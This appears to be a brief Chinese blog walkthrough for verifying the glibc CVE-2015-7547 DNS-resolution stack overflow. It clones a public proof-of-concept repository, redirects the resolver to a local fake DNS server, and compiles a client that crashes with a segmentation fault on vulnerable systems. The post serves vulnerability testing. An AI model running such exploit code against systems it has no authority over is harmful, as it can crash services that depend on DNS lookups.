libc CVE-2015-7547洞的成因及POC使用测试
测试:system:centos6.5 libc version: 2.19#下载测试代码
git clone https://github.com/fjserna/CVE-2015-7547.git根据漏洞描述,我们可以做一个假的DNS Server 作为中间人,来验证该漏洞。
# cat /etc/resolv.conf nameserver 127.0.0.1更改DNS 解析为 127.0.0.1,刷新DNS 缓存
/etc/init.d/network restart /etc/init.d/nscd restart执行 CVE-2015-7547-poc.py , 注意无需更改 ip_addr 。
python CVE-2015-7547-poc.py编译 CVE-2015-7547-client.c , 执行CVE-2015-7547-client,若含有漏洞,会造成Segmentation Fault。
[root@Log2 CVE-2015-7547]# gcc -o CVE-2015-7547-client CVE-2015-7547-client.c [root@Log2 CVE-2015-7547]# chmod +x CVE-2015-7547-client [root@Log2 CVE-2015-7547]# ./CVE-2015-7547-client Segmentation fault (core dumped)
libc CVE-2015-7547漏洞描述详见:https://www.lssin.com/blog/read.html?id=75